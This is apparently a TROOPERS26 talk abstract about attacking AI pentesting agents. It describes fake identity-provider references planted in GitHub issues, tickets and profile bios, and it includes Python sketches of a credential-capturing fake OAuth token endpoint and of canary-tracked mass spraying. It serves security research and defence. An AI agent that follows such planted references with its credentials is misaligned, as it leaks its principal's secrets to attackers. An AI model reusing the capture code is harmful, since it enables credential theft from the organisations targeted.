TROOPERS26 Call for Papers

Counteroffensive AI: Pwning AI Pentesters
2026-06-25, Track 1

AI-powered pentesting is the latest hype. Slap an LLM agent on top of well-known offensive
tools built by humans in their free time, run it in YOLO mode, and call it autonomous security
testing. Valuations are going through the roof!
Here is the thing though: by design, these agents consume untrusted input from the very targets
they are testing.

Current discourse around AI agent security focuses on prompt injection through direct
interaction. But what about the agent's environment itself? What happens when the attack
surface the agent is exploring has been prepared by an adversary? What if the authentication
service referenced in that one GitHub issue is actually a honeypot?
In this presentation we will demonstrate a complete attack framework against AI pentesting
agents and release it as open source. We show how to inject tracking payloads at scale into any
platform with user-generated content, operate fake services that capture credentials from AI
agents, and turn every future AI pentest engagement against a sprayed target into a passive
credential harvesting fest. No ongoing effort required, no exploits needed. The AI leaks to us,
fully automated!

The attacker does not need to talk to the agent. They just leave breadcrumbs where the agent
will find them during reconnaissance. A hint about a backup authentication endpoint in a GitHub
issue. A debug configuration in a support ticket. SSO metadata in a user profile bio. The agent
discovers these breadcrumbs, reasons that they are worth investigating, and acts on them with
whatever credentials and access it was given.

SSO authentication is a particularly brutal example because determining whether an Identity
Provider is in scope is hard: to test authenticated applications, an agent must follow OAuth/OIDC
redirects to external domains, and it needs to be told how to distinguish a legitimate Identity
Provider from a fake one we planted in user content.

But SSO is just one instance of the fundamental problem: the AI makes decisions based on
content it should not trust, and no amount of prompt engineering changes unless you know in
advance what the target will look like. We want to shed some light on the complications that
arise when putting AI literally to the test!


  1. The Promise vs. The Problem
    State of AI pentesting: what vendors claim, how agents actually work under the hood (LLM + tool
chain + YOLO execution). Quick demo: an AI agent solving a pentest challenge (GOAD cyber
    range) finds a file with a password hint and tries the credentials everywhere. Who placed that
    file? Core observation:
    agents consume untrusted input from the target and make autonomous decisions. This is the attack
    surface. Transition: forget prompt injection, what if the environment itself is hostile?

  2. The SSO Dilemma
    How SSO works in 60 seconds: OAuth2/OIDC/SAML flow, redirects to external IdP, token
    exchange. Why AI agents MUST follow SSO redirects: cannot test authenticated apps otherwise,
    this is table-stakes functionality. The catch-22: agents cannot distinguish legitimate IdPs from
    attacker-controlled ones discovered in user content (sketched below). Walk through failed
    mitigations: IdP allowlisting (fails for custom/internal IdPs), redirect-origin checking (fails for
    undocumented services), prompt engineering (the agent still cannot verify domain legitimacy),
    human confirmation (defeats autonomy). Key insight: this is architectural. The feature is the
    vulnerability. No amount of guardrails fixes this without removing the capability vendors are
    selling.
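
    To make the catch-22 concrete, here is a minimal Python sketch of every check an agent could
    automate (the hostnames are hypothetical placeholders, not real infrastructure): both the
    legitimate and the planted issuer serve a structurally valid OIDC discovery document, so
    nothing in the response itself reveals which one is fake.

    # Minimal sketch of the catch-22; hostnames are hypothetical placeholders.
    import json
    from urllib.request import urlopen

    ISSUERS = [
        "https://login.target-corp.com",             # legitimate IdP
        "https://sso.target-corp.com.attacker.net",  # planted in a GitHub issue
    ]

    REQUIRED_KEYS = {"issuer", "authorization_endpoint", "token_endpoint", "jwks_uri"}

    for issuer in ISSUERS:
        with urlopen(f"{issuer}/.well-known/openid-configuration") as resp:
            config = json.load(resp)
        # Both documents pass every programmatic check: the required metadata
        # is present and the issuer field matches the URL it was fetched from.
        # Legitimacy is simply not a property of the response bytes.
        assert REQUIRED_KEYS <= config.keys()
        assert config["issuer"] == issuer
        print(f"{issuer}: discovery document looks valid, proceeding to auth...")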

  3. Attack Framework: Architecture & Components
    HON-AI: The Fake Identity Provider: Full OAuth2/OIDC/SAML implementation that looks and
    responds like real IdPs. Endpoint coverage: OIDC discovery, OAuth authorize/token/userinfo, Okta
    primary auth + MFA verify, SAML metadata/SSO, ADFS, Azure AD-style. Credential capture:
    usernames, passwords, client secrets, MFA codes, bearer tokens, full request logging. Response
    strategy: returns plausible errors ("password expired", "MFA required") to encourage agents to
    retry with different credentials or escalate. Domain generation: sso.target.com.attacker.net,
    target.okta.attacker.net, login.target.microsoftonline.attacker.net.
    UZI: The Mass Reference Injector: Automated injection of fake SSO references into
    user-generated content: GitHub issues, forum posts, support tickets, user profile bios, wiki pages,
    comments. Payload templates per IdP style: OIDC discovery URLs, Okta-style auth, Azure AD,
    Auth0, SAML metadata, ADFS. Canary ID system: unique tracking identifiers embedded in URL
    paths for per-target attribution. Social engineering templates that AI agents find compelling: IT
    helpdesk notices, SSO migration announcements, disaster recovery documentation, staging
    environment references. A minimal capture-endpoint sketch follows below.
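
    As an illustration of the capture side, here is a sketch under assumed naming (not the released
    HON-AI code): a fake OIDC token endpoint with a canary ID embedded in the URL path, logging
    whatever the agent submits and answering with a plausible, retry-encouraging error.

    # Sketch of a canary-tracked fake token endpoint (Flask). Illustrative
    # only; the endpoint layout and field names are assumptions.
    from datetime import datetime, timezone
    from flask import Flask, request, jsonify

    app = Flask(__name__)

    @app.route("/<canary_id>/oauth2/token", methods=["POST"])
    def token(canary_id):
        # Capture everything the agent sends: resource-owner credentials,
        # client secrets, and any bearer token in the headers.
        capture = {
            "canary": canary_id,
            "time": datetime.now(timezone.utc).isoformat(),
            "form": request.form.to_dict(),
            "authorization": request.headers.get("Authorization"),
        }
        print("captured:", capture)  # in practice: persist to a datastore
        # A plausible error instead of a hard failure, nudging the agent to
        # retry with different credentials or escalate.
        return jsonify(error="invalid_grant",
                       error_description="Password expired, please "
                                         "re-authenticate."), 400

    if __name__ == "__main__":
        app.run(port=8443)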

  4. Live Demonstration: Single Target Attack
    Setup: target web application with injected SSO references, HON-AI fake IdP running, AI
    pentesting agent configured with test credentials. Show the injected payloads in context (forum
    post, support ticket, user profile). Launch AI pentest, observe agent discover SSO references
    during reconnaissance. Agent reasons about the references, decides to test authentication.
    Real-time credential capture on HON-AI: user password, then client secret, then MFA code. Show the
    captured credentials, demonstrate they are real and usable. Discuss agent behavior: it tried
    multiple credential types across multiple fake endpoints, exactly as designed.

  5. Mass Spray: Harvesting at Scale
    Economics of the attack: spray 10,000 targets once, harvest credentials as AI pentests happen over
    months. Canary-tracked URL structure: path-embedded IDs map captured credentials back to
    specific targets (sketched after this item). UZI mass mode demonstration: generating and
    injecting payloads across many
    targets. HON-AI collection dashboard: credentials arriving over time, attributed to targets via
    canary IDs. The compounding problem: as AI pentest adoption grows, the value of pre-planted
    canaries increases. Canary propagation: injected references can spread through document
    indexing, aggregation, and AI-generated summaries.
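
    The attribution mechanics can be sketched in a few lines (assumed naming; the campaign secret
    and collection domain are placeholders): derive one deterministic canary ID per target at spray
    time, then map the path segment of any captured request back to the sprayed target.

    # Sketch of per-target canary generation and attribution.
    import hmac, hashlib

    SECRET = b"spray-campaign-key"    # placeholder campaign secret
    ATTACKER_DOMAIN = "attacker.net"  # placeholder collection domain

    def canary_url(target: str) -> str:
        # Deterministic per-target ID: nothing to store at injection time.
        cid = hmac.new(SECRET, target.encode(), hashlib.sha256).hexdigest()[:16]
        return f"https://sso.{target}.{ATTACKER_DOMAIN}/{cid}/oauth2/token"

    # Spray time: one canary URL per target, indexed by the path segment.
    targets = ["target-a.example", "target-b.example"]
    index = {canary_url(t).split("/")[3]: t for t in targets}

    # Collection time: the canary ID in a captured request path attributes
    # the credentials to the specific sprayed target.
    captured = canary_url("target-b.example")
    print(index[captured.split("/")[3]])  # -> target-b.example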

  6. Implications & The Hard Questions
    For AI pentest vendors: your agents may leak credentials to anyone who plants fake IdP references,
    malicious reverse DNS entries and other honeypot traps. This is not fixable with prompt
    engineering alone. Fully autonomous pentesting with SSO support needs security controls and
    guardrails beyond what is in place today. For enterprises using AI pentesting: use dedicated
    pentest-only accounts, rotate credentials immediately after engagement, audit user-generated
    content for planted references. For red teamers and adversaries: this is a new passive collection
    capability with minimal operational overhead. Broader implications for AI agents in adversarial
    environments: any agent that acts on discovered content in hostile environments faces the same
    class of problem.

  7. Tool Release & Q&A
    Open-source release of HON-AI, UZI, and the victim-app test harness. Repository URL,
    documentation, and usage guidance. Responsible disclosure timeline and vendor notification
    summary.

Markus Vervier is CEO of Persistent Security and Director at X41 D-Sec GmbH, a specialized
application security, penetration testing, and red/purple-teaming provider. Over the past 18 years
he has worked as a security researcher, code auditor, and penetration tester. His work includes
security analysis and reverse engineering of embedded firmware for mobile devices, discovering
vulnerabilities in Signal Private Messenger (with JP Aumasson), and finding a remote vulnerability
in libOTR. He is currently active in the development of offensive security tooling and platforms
that break AI security defenses.